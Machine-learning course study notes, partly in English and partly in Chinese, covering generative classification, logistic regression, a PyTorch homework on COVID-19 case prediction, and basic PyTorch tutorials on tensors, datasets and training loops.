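rng = np.random.default_rng(0)
water = rng.normal([75.0, 70.0], 10.0, size=(79, 2))    # stand-ins for the 79 Water Pokémon
normal = rng.normal([60.0, 55.0], 10.0, size=(61, 2))   # stand-ins for the 61 Normal Pokémon

def fit_gaussian(X):
    mu = X.mean(axis=0)
    sigma = np.cov(X, rowvar=False, bias=True)   # MLE uses the biased covariance estimate
    return mu, sigma

def density(x, mu, sigma):
    d = x - mu
    D = len(mu)
    norm = 1.0 / ((2 * np.pi) ** (D / 2) * np.linalg.det(sigma) ** 0.5)
    return norm * np.exp(-0.5 * d @ np.linalg.solve(sigma, d))

(mu1, s1), (mu2, s2) = fit_gaussian(water), fit_gaussian(normal)
p1, p2 = 79 / 140, 61 / 140                      # the priors P(C1), P(C2)
x = np.array([48.0, 50.0])                       # Psyduck's feature vector
post = p1 * density(x, mu1, s1) / (p1 * density(x, mu1, s1) + p2 * density(x, mu2, s2))
print("P(C1 | x) =", post)                       # assign class 1 if this exceeds 0.5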

Yet the results are not good… even with all the features included, the accuracy is only 54%.

Adjust the model: assume the two classes share the same covariance matrix.

The two types then share $\Sigma = \frac{79}{140}\Sigma^1+\frac{61}{140}\Sigma^2$

The decision boundary becomes a straight line again; although it is nothing like a regression line, this too is called a linear model.

With all the features included, the accuracy rises to 73%.

The 3 steps, summarized:

• Build the model
• Evaluate how good a function is
• Find the best function

If you assume all the feature distributions are independent, you are using a naive Bayes classifier.

For binary features, do not use a Gaussian; use a Bernoulli distribution instead.

Why is the boundary a straight line?

Rewrite $P(C_1|x)$ in terms of the sigmoid function: $P(C_1|x)=\sigma(z)$

After some derivation, $z$ can be written as a linear expression.

$P(C_1|x)=\sigma(w\cdot x + b)$: when $\Sigma$ is shared, the boundary between class 1 and class 2 is linear.

Can we find $w$ and $b$ directly to get the boundary, bypassing the computation of $N_1,N_2,\mu^1,\mu^2,\Sigma$? To be continued.

Logistic Regression

From the previous lecture, the chosen model is $f_{w,b}(x)=P_{w,b}(C_1|x)$

$$f_{w,b}(x)=\sigma(z),\quad z=\sum_iw_ix_i+b$$

Define the likelihood:

$$L(w,b)=f_{w,b}(x^1)f_{w,b}(x^2)\left(1-f_{w,b}(x^3)\right)\cdots f_{w,b}(x^N)$$

The goal is the $w^*,b^*$ that maximize $L$.

Encode the class of example $n$ as $\hat y^n$: 1 for class 1, 0 for class 2.

Turn the search for $\arg\max_{w,b}L(w,b)$ into $\arg\min_{w,b}-\ln L(w,b)$.

$-\ln L(w,b)$ then works out to a sum of cross-entropies between Bernoulli distributions.

Why does logistic regression not use the squared error, the way linear regression does?

Find the best function: minimize $-\ln L(w,b)$, again by gradient descent.

The resulting update rule turns out to be the same as for linear regression.
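For reference, both regressions end up with the same gradient-descent update (the standard result the slides arrive at):

$$w_i \leftarrow w_i - \eta\sum_n -\left(\hat y^n - f_{w,b}(x^n)\right)x^n_i$$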

Summary:

Step | Logistic Regression | Linear Regression
1. Model | $f_{w,b}(x)=\sigma\left(\sum_iw_ix_i+b\right)$, output in $[0,1]$ | $f_{w,b}(x)=\sum_iw_ix_i+b$, output can be any value
2. Goodness of function | training set $(x^n,\hat y^n)$, where $\hat y^n$ is 1 for class 1 and 0 for class 2; loss $L(f)=\sum_n C(f(x^n),\hat y^n)$, the cross-entropy | training set $(x^n,\hat y^n)$, where $\hat y^n$ is a real value; loss $L(f)=\frac{1}{2}\sum_n (f(x^n)-\hat y^n)^2$, the MSE
3. Best function | the same for both | the same for both

What if logistic regression used the squared error as its loss?

The derivative can be 0 even far from the optimum, so the parameters stop updating.

Comparing cross-entropy with squared error: in logistic regression the squared-error surface is too flat, which is bad for training.

For $P(C_1|x)=\sigma(w\cdot x + b)$:

a discriminative model finds $w$ and $b$ directly;

a generative model computes $\mu^1,\mu^2,\Sigma^{-1}$ from the samples.

Both pick from the same model class, yet they usually end up with different functions.

Same model, same training data, different resulting $(w,b)$: the generative model makes prior assumptions about the probability distribution. For this reason a discriminative model generally performs better than a generative one.

For the training set on the slide, given the test point $\begin{bmatrix}1\\1\end{bmatrix}$, a naive Bayes classifier answers class 2, contrary to intuition.

• Benefits of the generative model
  • With the assumption of a probability distribution, less training data is needed
  • With the assumption of a probability distribution, it is more robust to noise
  • Priors and class-dependent probabilities can be estimated from different sources.

For more than two classes, use the Softmax operation to obtain a probability distribution.

The Softmax formula can be derived mathematically.
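For reference, the Softmax mentioned here maps the class scores $z_i$ to a probability distribution:

$$y_i=\frac{e^{z_i}}{\sum_j e^{z_j}}$$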

The limitation of logistic regression: it struggles with XOR,

because no single straight line separates the two classes.

The fix: feature transformation. For example, let $x_1'$ be the distance from the point to $\begin{bmatrix}0\\0\end{bmatrix}$ and $x_2'$ the distance to $\begin{bmatrix}1\\1\end{bmatrix}$; after this transformation the data can be separated by a straight line, as the sketch below illustrates.

Finding such a feature transformation by hand, however, is not easy.
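Here is that transform computed on the four XOR points (my own sketch):

import numpy as np

pts = np.array([[0., 0.], [0., 1.], [1., 0.], [1., 1.]])
labels = [0, 1, 1, 0]                                     # XOR labels of the four corners
x1p = np.linalg.norm(pts - np.array([0., 0.]), axis=1)    # x1': distance to (0, 0)
x2p = np.linalg.norm(pts - np.array([1., 1.]), axis=1)    # x2': distance to (1, 1)
for (a, b), y in zip(zip(x1p, x2p), labels):
    print(f"({a:.2f}, {b:.2f}) -> class {y}")
# Class-1 points land at (1.00, 1.00); class-0 points at (0.00, 1.41) and (1.41, 0.00),
# so a single straight line such as x1' + x2' = 1.7 now separates the two classes.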

Instead, add neurons in front of the classifying perceptron to perform the feature transformation automatically.

This yields a way to solve XOR with logistic regression.

Summing up the construction: it is a neural network, which we may also call Deep Learning.

HW1

Download data

Get the datasets covid.train.csv and covid.test.csv from https://www.kaggle.com/competitions/ml2022spring-hw1.

Import packages

# Numerical operations
import math
import numpy as np
# Reading/writing data
import pandas as pd
import os
import csv
# Progress bar
from tqdm import tqdm
# PyTorch
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader, random_split
# Plotting learning curves
from torch.utils.tensorboard import SummaryWriter

Some Utility Functions

You do not need to modify this part.

def same_seed(seed):
    """Fix random number generator seeds for reproducibility."""
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed_all(seed)


def train_valid_split(data_set, valid_ratio, seed):
    """Split the provided training data into training and validation sets (returned as numpy arrays)."""
    valid_set_size = int(valid_ratio * len(data_set))
    train_set_size = len(data_set) - valid_set_size
    train_set, valid_set = random_split(data_set,
                                        [train_set_size, valid_set_size],
                                        generator=torch.Generator().manual_seed(seed))
    return np.array(train_set), np.array(valid_set)


def predict(test_loader, model, device):
    model.eval()  # set the model to evaluation mode
    preds = []
    for x in tqdm(test_loader):
        x = x.to(device)
        with torch.no_grad():
            pred = model(x)
            preds.append(pred.detach().cpu())
    preds = torch.cat(preds, dim=0).numpy()
    return preds

Dataset

class COVID19Dataset(Dataset):
    """
    x: features
    y: targets; if None, do prediction
    """
    def __init__(self, x, y=None):
        if y is None:
            self.y = y
        else:
            self.y = torch.FloatTensor(y)  # convert the labels from np.array to torch tensors
        self.x = torch.FloatTensor(x)

    def __getitem__(self, idx):
        """Return one sample by index."""
        if self.y is None:
            return self.x[idx]
        else:
            return self.x[idx], self.y[idx]

    def __len__(self):
        return len(self.x)

Neural Network Model

Try different model architectures by modifying the class below.

class My_Model(nn.Module):
    def __init__(self, input_dim):
        super(My_Model, self).__init__()  # call nn.Module's __init__
        # TODO: modify the model's structure; mind the dimensions.
        # Define the layers attribute that holds the network structure
        self.layers = nn.Sequential(
            nn.Linear(input_dim, 16),
            nn.ReLU(),           # activation: ReLU
            nn.Linear(16, 8),    # 16 features in, 8 out
            nn.ReLU(),
            nn.Linear(8, 1)      # 8 features in, 1 out (regression)
        )

    def forward(self, x):
        x = self.layers(x)
        x = x.squeeze(1)  # squeeze the output dimension: (B, 1) -> (B)
        return x

Feature Selection

Choose the features you consider useful by modifying the function below.

def select_feat(train_data, valid_data, test_data, select_all=True):
    """Select useful features for regression."""
    y_train, y_valid = train_data[:, -1], valid_data[:, -1]
    raw_x_train, raw_x_valid, raw_x_test = train_data[:, :-1], valid_data[:, :-1], test_data

    if select_all:
        feat_idx = list(range(raw_x_train.shape[1]))
    else:
        feat_idx = [0, 1, 2, 3, 4]  # TODO: select suitable feature columns

    return raw_x_train[:, feat_idx], raw_x_valid[:, feat_idx], raw_x_test[:, feat_idx], \
           y_train, y_valid

Training Loop

def trainer(train_loader, valid_loader, model, config, device):
    # Define the loss function
    criterion = nn.MSELoss(reduction='mean')
    # Define the optimizer
    # TODO: check https://pytorch.org/docs/stable/optim.html for more available algorithms
    # TODO: L2 regularization (optimizer parameter) or implement it yourself
    optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.9)

    writer = SummaryWriter()  # tensorboard visualization

    if not os.path.isdir('./models'):
        os.mkdir('./models')  # create a directory to save models

    n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

    for epoch in range(n_epochs):
        model.train()  # set the model to training mode
        loss_record = []

        # tqdm visualizes the training progress
        train_pbar = tqdm(train_loader, position=0, leave=True)

        for x, y in train_pbar:
            optimizer.zero_grad()              # reset gradients to 0
            x, y = x.to(device), y.to(device)  # move data to the device
            pred = model(x)
            loss = criterion(pred, y)
            loss.backward()                    # compute gradients (backpropagation)
            optimizer.step()                   # update parameters
            step += 1
            loss_record.append(loss.detach().item())

            # Show the current epoch and loss on the progress bar
            train_pbar.set_description(f'Epoch [{epoch+1} / {n_epochs}]')
            train_pbar.set_postfix({'loss': loss.detach().item()})

        mean_train_loss = sum(loss_record) / len(loss_record)
        writer.add_scalar('Loss/train', mean_train_loss, step)

        model.eval()  # set the model to evaluation mode
        loss_record = []
        for x, y in valid_loader:
            x, y = x.to(device), y.to(device)
            with torch.no_grad():
                pred = model(x)
                loss = criterion(pred, y)

            loss_record.append(loss.item())

        mean_valid_loss = sum(loss_record) / len(loss_record)
        print(f'Epoch [{epoch + 1} / {n_epochs}]: Train loss: {mean_train_loss: .4f}, \
Valid loss: {mean_valid_loss: .4f}')
        writer.add_scalar('Loss/valid', mean_valid_loss, step)

        if mean_valid_loss < best_loss:
            best_loss = mean_valid_loss
            torch.save(model.state_dict(), config['save_path'])  # save the best model so far
            print('Saving model with loss {:.3f}...'.format(best_loss))
            early_stop_count = 0
        else:
            early_stop_count += 1

        if early_stop_count >= config['early_stop']:
            # The model stopped improving, so halt training
            print('\nModel is not improving, so we halt the training session.')
            return
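One simple way to tackle the L2-regularization TODO above (my suggestion, not part of the handout) is the optimizer's built-in weight_decay argument, which adds an L2 penalty on the parameters:

# Assumed drop-in replacement for the optimizer line in trainer() above.
optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'],
                            momentum=0.9, weight_decay=1e-4)  # 1e-4 is an arbitrary example value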

Configurations

config holds the hyperparameters and the model save path.

device = 'cuda' if torch.cuda.is_available() else 'cpu'
config = {
    'seed': 5201314,        # random seed
    'select_all': True,     # whether to use all features
    'valid_ratio': 0.2,     # validation size = train size * valid_ratio
    'n_epochs': 3000,       # number of epochs
    'batch_size': 256,      # batch size
    'learning_rate': 1e-5,  # learning rate
    'early_stop': 400,      # stop training if the model does not improve for this many epochs
    'save_path': './models/model.ckpt'  # where to save the model
}

Dataloader

Read data from files and set up training, validation, and testing sets. You do not need to modify this part.

# Set seed for reproducibility
same_seed(config['seed'])

# train_data size: 2699 x 118 (id + 37 states + 16 features x 5 days)
# test_data size: 1078 x 117 (without last day's positive rate)
train_data, test_data = pd.read_csv('./covid.train.csv').values, \
                        pd.read_csv('./covid.test.csv').values
train_data, valid_data = train_valid_split(train_data,
                                           config['valid_ratio'],
                                           config['seed'])

# Print out the data size.
print(f"""train_data size: {train_data.shape}
valid_data size: {valid_data.shape}
test_data size: {test_data.shape}""")

# Select features
x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data,
                                                         valid_data,
                                                         test_data,
                                                         config['select_all'])

# Print out the number of features.
print(f'number of features: {x_train.shape[1]}')

train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
                                             COVID19Dataset(x_valid, y_valid), \
                                             COVID19Dataset(x_test)

# PyTorch DataLoader loads a PyTorch Dataset in batches.
train_loader = DataLoader(train_dataset, batch_size=config['batch_size'],
                          shuffle=True, pin_memory=True)
valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'],
                          shuffle=True, pin_memory=True)
test_loader = DataLoader(test_dataset, batch_size=config['batch_size'],
                         shuffle=False, pin_memory=True)

train_data size: (2160, 118)
valid_data size: (539, 118)
test_data size: (1078, 117)
number of features: 117

Start training!

# Put your model and data on the same computation device.
model = My_Model(input_dim=x_train.shape[1]).to(device)
trainer(train_loader, valid_loader, model, config, device)

Plot learning curves with tensorboard (optional)

Visualize the training results.

tensorboard is a tool that allows you to visualize your training progress.

If this block does not display your learning curve, please wait a few minutes and re-run it. It might take some time to load the logging information.

%reload_ext tensorboard
%tensorboard --logdir=./runs/

This displays tensorboard inside the Jupyter Notebook.

Testing

The predictions of your model on the testing set will be stored at pred.csv.

def save_pred(preds, file):
    """Save predictions to the specified file."""
    with open(file, 'w') as fp:
        writer = csv.writer(fp)
        writer.writerow(['id', 'tested_positive'])
        for i, p in enumerate(preds):
            writer.writerow([i, p])

model = My_Model(input_dim=x_train.shape[1]).to(device)
model.load_state_dict(torch.load(config['save_path']))
preds = predict(test_loader, model, device)
save_pred(preds, 'pred.csv')
100%|██████████| 5/5 [00:00<00:00, 500.02it/s]
    ]]>
    + Preparation

    ##【機器學習 2021】預測本頻道觀看人數 -上- - 機器學習基本概念簡介

    什么是机器学习

    png

    Machine Learning ≈ Look for Function 让机器具备找函数的能力

    • Speech Recognition 语音辨识
    • Image Recognition 图像识别
    • Playing Go 下围棋

    机器学习的各个领域

    png

    • Regression 回归,如接受今日 PM 2.5,气温和臭氧含量作为参数,以明日 PM2.5 作为输出
      • The function outputs a scalar. 该函数输出一个标量。
    • Classification 分类,如判断收到的邮件是否为垃圾邮件。
      • Given options (classes), the function outputsthe correct one. 给出选项(类),该函数输出正确的选项。

    png

    ​ 如下围棋就是一个分类问题,将围棋的每个坐标当作一个类来看。

    png

    回归分类只是机器学习中的一小部分,还有结构化学习 Structured Learning,输入和输出都是具有结构化的对象(数列、列表、树、边界框等)。

    举例:预测本频道观看人数

    png

    ​ 找到一个函数用于描述某天本频道观看人数。

    1.Function with Unknown Parameters

    png

    ​ 我们假设某天本频道观看人数 $y$ 与其前一天本频道观看人数 $x_1$ 有关,且满足关系式 $y = b + wx_1$。

    ​ 参数 $w$ 和 $b$ 都是未知的,要从数据中学习得出。

    2.Define Loss from Training Data

    png

    损失函数 $L(b, w)$ 是一个含有参数 $w$ 和 $b$ 的函数,用于衡量参数 $w$ 和 $b$ 的取值有多好。

    $$Loss: L = \frac{1}{N}\sum_ne_n$$

    $y$ 表示预测值,$\hat y$ 表示实际值,$e$ 表示误差

    • 如果 $e=|y-\hat y|$,则 $L$ 为平均绝对值误差(MAE)
    • 如果 $e=(y-\hat y)^2$,则 $L$ 为均方误差(MSE)

    如果 $y$ 和 $\hat y$ 都是概率分布,则用交叉熵损失函数(Cross-entropy)

    3.Optimization

    $$w*,b*=arg\min_{w, b}L$$

    ​ 找到使 $L$ 值最小时 $w$ 和 $b$ 的取值。

    png

    先考虑只有参数 $w$ 的情况:

    $$w^*=arg\min_w L$$

    使用梯度下降方法:

    -(随机)挑选一个初始值 $w^0$

    • 计算 $L$ 对 $w$ 的导数 $\frac{\partial L}{\partial w}|_{w=w^0}$

    • 迭代更新 $w$,$w^1\leftarrow w^0 - {\color{Red} \eta } \frac{\partial L}{\partial w}|_{w=w^0}$

      • 其中 ${\color{Red} \eta }$ 被称为学习率(learning rate),这是由用户自行设定的。
        • 由用户自行设定的参数被称为超参数(hypermeters)

    ​ 梯度下降方法只能找到 $L$ 的极小值(local minima)而不是最小值(global minima),但这不是梯度下降方法最大的问题。

    ​ 为什么不采用暴力搜索的方法查找最小值?如果参数过多,暴力搜索的方法就无法实现了,只能采用梯度下降方法。

    png

    ​ 对于多个参数 $w$ 和 $b$,原理相同。

    ​ 至于求导,可以由深度学习框架自行解决。

    ​ 何时停止迭代?当算得的梯度为 0 或者人为终止迭代。

    $$\bigtriangledown L = \begin{bmatrix}
    \frac{\partial L}{\partial w} \
    \frac{\partial L}{\partial b}
    \end{bmatrix}_{\mathrm{gradient}}$$

    因而得名梯度下降。

    png

    ​ 随着迭代次数增加,$L$ 值逐渐减小。

    ​ 在这个示意图中,红色表示 $L$ 值较大,蓝色表示 $L$ 值较小。

    总结

    png

    ​ 最后的训练好的模型中 $w*=0.97$,$b=0.1k。$对于训练集(2017-2020 中各天本频道观看人数):$L(w^, b^*)=0.48k$。

    ​ 而对于训练时未用到的数据(2021 中各天本频道观看人数),$L’=0.58k$。

    png

    ​ 训练好的模型只是简单地认为当日的本频道观看人数与前一日本频道观看人数有关,而从实际情况可以看出,本频道观看人数似乎有一定的周期性,如一周的周末中本频道观看人数较少。

    png

    ​ 调整模型,如 $y=b+\sum^7_{j=1}w_jx_j$,就考虑本频道观看人数情况与前一周的本频道观看人数情况有关,此时 $L$ 和 $L’$ 都有所下降。

    ​ 若 $y=b+\sum^{28}_{j=1}w_jx_j$,则 $L$ 和 $L’$ 又有所下降。

    ​ 而当 $y=b+\sum^{56}_{j=1}w_jx_j$ 时,$L$ 和 $L’$ 不再下降,说明再扩大天数并不能更好地优化模型了。

    ##【機器學習 2021】預測本頻道觀看人數 -下- - 深度學習基本概念簡介

    1.Function with Unknown Parameters

    png

    ​ 也许**线性模型(Linear models)**太过简单,我们需要更复杂的模型。如图所示,如果真实模型像红色折线的那样,则你无论怎么训练线性模型,都无法很好地拟合真实情况。

    Model Bias 一般是由于模型设计太过简单,此时再进行训练也无法找到更好的参数来使 $L$ 降低。

    png

    ​ 我们可以将这个红色折线由一个常数和若干个 Hard Sigmoid 函数之和来表示:$y=b+\sum_ic_i\mathrm{sigmoid}(b_i+w_ix_1)$。

    png

    ​ 任何折线都可以用这种形式来表示,只要 Hard Sigmoid 函数管够就行。

    ​ Sigmoid 函数的个数?由用户自行设定,这也是一个 hypermeters。

    png

    ​ 用片状线性曲线近似连续曲线。为了有好的近似,我们需要足够的片断。

    png

    ​ 一般用 Soft Sigmoid 函数(往往称为 Sigmoid 函数)去逼近这个 Hard Sigmoid 函数。

    Sigmoid 函数:$y=c\frac{1}{1+e^{-(b+wx_1)}}=c\mathrm{sigmoid}(b+wx_1)$

    png

    • 不同的 $w$ 会修改 Sigmoid 函数的坡度

    • 不同的 $b$ 会平移 Sigmoid 函数

    • 不同的 $c$ 会修改 Simoid 函数的高度

    png

    ​ 这样我们就得到了一个具有更多特征的新的回归模型:$y=b+\sum_ic_i\mathrm{sigmoid}\left(b_i+\sum_jw_ijx_j\right)$

    png

    • $i$ 表示 Sigmoid 函数的序号
    • $j$ 表示特征的序号
    • $w_{ij}$ 表示第 $i$ 个 Sigmoid 函数第 $x_j$ 的权重

    png

    ​ 再通过激活函数和相加后得到最后的回归模型 $y$。

    png

    ​ 这个表达式可以用向量乘法简单表示。

    png

    ​ 将所有参数拉长变成一个向量 $\theta$。

    2.Define Loss from Training Data

    ​ 损失函数 $L$ 与之前没有什么变化,但是由于参数变多,用 $L(\theta)$ 表示。

    png

    3.Optimization

    png

    png

    ​ 现在问题变为 $\mathbf{\theta}^*=arg\min_\theta L$,方法与之前类似,只不过参数变多了。

    ​ 用 $\mathbf{g}$ 对各个参数的导数总和作简写。

    png

    ​ 由于参数量过多,要把数据集分成多个 batch 来更新参数 $\mathbf{\theta}^*$。一次计算完所有数据集的迭代过程称为 epoch

    png

    ​ 举例:

    • 如果有 10000 个数据,Batch 的大小为 10,则一次 epoch 需要更新 1000 次参数。
    • 如果有 1000 个数据,Batch 的大小为 100,则一次 epoch 需要更新 10 次参数。

    Batch 的大小也是一个 hypermeters。

    png

    ​ 也可以用两个 ReLU 叠加起来来代替 Sigmoid 函数来逼近 Hard Sigmoid 函数。

    png

    ​ 我们把这种函数称之为激活函数,一般来说 ReLU 会比 Sigmoid 效果更好些。

    png

    ​ 我们用多个 ReLU 来逼近最终的回归曲线,可以看到随着 ReLU 的个数增多,$L$ 的值有所下降。

    png

    ​ 我们也可以进行多次这种计算,形成深度神经网络

    png

    ​ 3 层神经网络的预测结果,由于模型中并没有考虑春节的因素,在春节前后误差较大。

    png

    ​ 给所接触到的东西作一个统一的命名。

    png

    ​ 随着时代的发展,神经网络的层数越来越多,准确率越来越好。

    Residual Net 并不是简单的 Fully Connected Network,使用了 Special structure,不然很可能会过拟合。

    png

    ​ 神经网络的层数并不是越多越好,过多的层数可能会出现过拟合的现象。

    Class Material

    ##【機器學習 2022】開學囉- 又要週更了-

    机器学习课程速览

    ​ This course focuses on Deep Learning.

    png

    ​ 在机器学习中,输入的数据可以是向量矩阵(如图像)、序列(如语音,文本),输出的数据可以是标量(回归)、类别(分类)、文本、图像等。

    教机器的种种方法

    • HW1:COVID-19 Case Prediction 新冠感染人数预测
      • 输入向量、输出标量
    • HW2:Phoneme Classification 因素分类
      • 输入向量、输出类别
    • HW3:Image Classification 图像分类
      • 输入矩阵、输出类别
    • HW4:Speaker Classification 说话者分类
      • 输入序列、输出类别
    • HW5:Machine Translation 机器翻译
      • 输入序列、输出文本
    • HW6:动漫脸谱生成

    Lecture 1 - 5 有监督学习

    png

    课程 1-5 属于有监督学习,以给一张图片,让机器分类是宝可梦还是数码宝贝为例,训练集需要有对应的标签。

    Lecture 7 自监督学习

    png

    ​ 要在深度神经网络中应用监督学习,我们需要足够的标记数据。但是人工手动标记数据既耗时又昂贵。对于一些特殊的领域,比如医学领域获取足够的数据本身就是一个挑战。因此,监督学习当前的主要瓶颈是标签生成和标注。

    自监督学习是通过以下方式将无监督问题转化为有监督问题的方法。

    png

    预训练模型 Pre-trained Model(基础模型 Foundation Model) 之于 下游模型 Downstream Tasks 相当于 操作系统 之于 应用。

    ​ AI 专家将大模型统一命名为 Foundation Models,可以翻译为基础模型或者是基石模型。

    Lecture 6 GAN

    png

    GAN:是训练集的输入 $x$ 和输出 $y$ 不必配对地出现。

    png

    常见领域:

    Lecture 12 强化学习

    png

    ​ 在人也不能确定最优解时——强化学习

    进阶课题——不只是追求正确率

    Lecture 8 异常检测

    png

    ​ 让机器在能识别这个图像是宝可梦还是神奇宝贝的同时,还能识别异常图片,返回”I don’t know“。

    Lecture 9 Explainable AI

    png

    ​ 让机器知其然还要知其所以然。

    png

    ​ 举例,在机器判别图片是宝可梦还是神奇宝贝的过程中,将其判别的主要依据用特定的记号标记,然而判别的主要依据不在生物本身上?

    png

    ​ 最后发现原因:宝可梦的所有图片都是 PNG 格式,而大多数数码宝贝的图片是 JPEG 格式。机器根据背景颜色区分宝可梦和数码宝贝。

    Lecture 10 Model Attack

    png

    ​ 往图片中一定的噪音,可能会出现截然不同的判别结果。

    攻防问题

    • 攻:通过加入某些噪音破坏判别结果
    • 防:防止某些噪音破坏判别结果

    Lecture 11 领域适应性

    png

    ​ 在黑白图像中训练好的模型,在黑白图像里测试准确率好,但在彩色图像中准确率差。

    Lecture 神经网络压缩

    png

    ​ 在资源受限的环境中部署 ML 模型。

    Lecture 14Life-long Learning

    png

    ​ Life-long Learning 的目标,让机器能解决各种问题。

    学习如何学习

    Lecture 15 元学习

    png

    ​ 少量的学习通常是通过元学习实现的。让机器自己找到一个机器学习的算法。

    ML 2022 PyTorch Tutorial 1

    安装 pytorch

    按照官方的方法是从官网 PyTorch 安装 pytorch 环境,但这在国内下载真的好慢……

    png

    鼓捣了老半天觉得用离线安装的方式比较好 orz

    从镜像站 https://download.pytorch.org/whl/torch_stable.html 下载对应版本的torchtorchvision

    下载了 cu117/torch-1.13.1%2Bcu117-cp39-cp39-win_amd64.whl cu117/torchvision-0.14.1%2Bcu117-cp39-cp39-win_amd64.whl

    在下载到的目录进入 cmd 使用pip install torch-l.13.1+cul17-cp39-cp39-win amd64.whlpip install torchvision-0.14.1+cu117-cp39-cp39-win amd64.whl安装。

    在 python 中验证:

    1
    2
    3
    4
    import torch

    print(torch.__version__)
    print(torch.cuda.is_available()) # cuda 显卡是否可以使用
    1
    2
    1.13.1+cu117
    True

    Training Neural Networks

    训练神经网络的步骤:

    • 定义神经网络结构,定义损失函数,定义优化算法
    • 训练

    Training & Testing Neural Networks

    在训练模型中使用训练集 Training 和 验证集 Validation,测试模型时使用 Testing。

    Training & Testing Neural Networks - in Pytorch

    Step 1.torch.utils.data.Dataset & torch.utils.data.DataLoader

    Dataset & Dataloader

    DataSet: 存储数据样本 $x$ 和预期值 $y$

    Dataloader: 对数据进行分批分组 groups data in batches,实现多任务处理

    1
    2
    dataset = MyData(file)
    dataloader = DataLoader(dataset, batch_size, shuffle=True)

    机器学习,深度学习模型训练阶段的 Shuffle 重要么?为什么?_技术宅 zch 的博客-CSDN 博客_深度学习 shuffle

    • 对于 Training 和 Validation,需要打乱,shuffle=True
    • 对于 Testing,不需要打乱,shuffle=False

    如下列代码就将数据集分成 5 给 batch:

    1
    2
    dataset = MyDataset(file)
    dataloader = DataLoader(dataset, batch_size=5, shuffle=False)

    png

    设计一个 MyDataset 类用于管理数据集:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    from torch.utils.data import Dataset, DataLoader


    class MyDataset(Dataset):
    def __init__(self, file):
    """读取数据并初始化"""
    self.data = ...


    def __getitem__(self, index):
    """返回一个数据"""
    return self.data[index]


    def __len__(self):
    """返回数据集的大小"""
    return len(self.data)
    Tensors

    pytorch 中的 Tensors 就是高维数组,相当于 numpy 中的 array

    dim in PyTorch == axis in NumPy

    创建 tensor
    • 直接填入数据,list 或 numpy.ndarray
    1
    x = torch.tensor([[1, -1], [-1, 1]])
    1
    x = torch.from_numpy(np.array([[1, -1], [-1, 1]]))
    • 输入形状,填入 0 或 1
    1
    x = torch.zeros([2, 2])
    1
    x = torch.ones([1, 2, 5])
    常见运算符
    • 加法
    1
    z = x + y
    • 减法
    1
    z = x - y
    • 乘方
    1
    y = x.pow(2)
    • 求和
    1
    y = x.sum()
    • 均值
    1
    y = x.mean()
    • 转置
    1
    x = x.transpose(0, 1)
    • Squeeze 移出某个维度

    png

    • Unsqueeze 添加某个维度

    png

    • Cat 拼接数组

    png

    PyTorch v.s. Numpy

    数据类型:

    Data typedtypetensor
    32-bit floating pointtorch.floattorch.FloatTensor
    64-bit integer (signed)torch.longtorch.LongTensor
    PyTorchNumpy
    x.shapex.shape
    x.dtypex.dtype
    x.reshape / x.viewx.reshape
    x.squeeze()x.squeeze()
    x.unsqueeze(1)np.expand_dims(x, 1)
    Device

    自行选择 CPU 或 Cuda 对 Tensors 进行运算。

    CPU

    1
    x = x.to(‘cpu’)

    GPU

    1
    x = x.to(‘cuda’)
    计算梯度

    定义 $x$,并事先告知需要计算梯度 requires_grad=True

    $$x=\begin{bmatrix}1 & 0 \ -1 & 1\end{bmatrix}$$

    1
    x = torch.tensor([[1., 0.], [-1., 1.]], requires_grad=True)

    $$z=\sum_i\sum_j x^2_{i,j}$$

    1
    z = x.pow(2).sum()

    求导

    $$\frac{\partial z}{\partial x_{i,j}}=2x_{i,j}$$

    1
    z.backward()

    得到 $x$ 的梯度

    $$\frac{\partial z}{\partial x}=\begin{bmatrix}2&0\-2&2\end{bmatrix}$$

    1
    x.grad
    1
    tensor([[ 2., 0.], [-2., 2.]])

    Step 2.torch.nn.Module

    • 全连接层
    1
    layer = torch.nn.Linear(32, 64)
    • 激活函数
    1
    2
    nn.Sigmoid()
    nn.ReLU()

    将定义的神经网络模型放在MyModel类中:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import torch.nn as nn
    class MyModel(nn.Module):
    def __init__(self):
    """初始化你的模型,定义神经网络层"""
    super(MyModel, self).__init__()
    self.net = nn.Sequential(
    nn.Linear(10, 32),
    nn.Sigmoid(),
    nn.Linear(32, 1)
    )


    def forward(self, x):
    """计算你的 NN 的输出"""
    return self.net(x)

    可以不使用nn.Sequential,效果与下面的代码作用一致

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import torch.nn as nn

    class MyModel(nn.Module):
    def __init__(self):
    super(MyModel, self).__init__()
    self.layer1 = nn.Linear(10, 32)
    self.layer2 = nn.Sigmoid(),
    self.layer3 = nn.Linear(32,1)


    def forward(self, x):
    out = self.layer1(x)
    out = self.layer2(out)
    out = self.layer3(out)
    return out

    Step 3.torch.nn.MSELoss torch.nn.CrossEntropyLoss etc.

    定义损失函数

    • MSE
    1
    criterion = nn.MSELoss()
    • 交叉熵损失函数
    1
    criterion = nn.CrossEntropyLoss()
    • 输入预测值和实际值计算 loss
    1
    loss = criterion(model_output, expected_value)

    Step 4.torch.optim

    找到一个函数以减少 loss 的值,如 随机梯度下降法 Stochastic Gradient Descent (SGD)

    1
    torch.optim.SGD(model.parameters(), lr, momentum = 0)

    Step 5.Entire Procedure

    Neural Network Training Setup

    完整流程:读取数据-分割数据-定义模型-定义损失函数-定义优化函数

    1
    2
    3
    4
    5
    dataset = MyDataset(file)
    tr_set = DataLoader(dataset, 16, shuffle=True)
    model = MyModel().to(device)
    criterion = nn.MSELoss()
    optimizer = torch.optim.SGD(model.parameters(), 0.1)
    Neural Network Training Loop

    训练过程:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    for epoch in range(n_epochs):  # 进行一个 epoch
    model.train() # 将模型设为 train 模式
    for x, y in tr_set: # 从 dataloader 中读入 x, y
    optimizer.zero_grad() # 将梯度设为 0
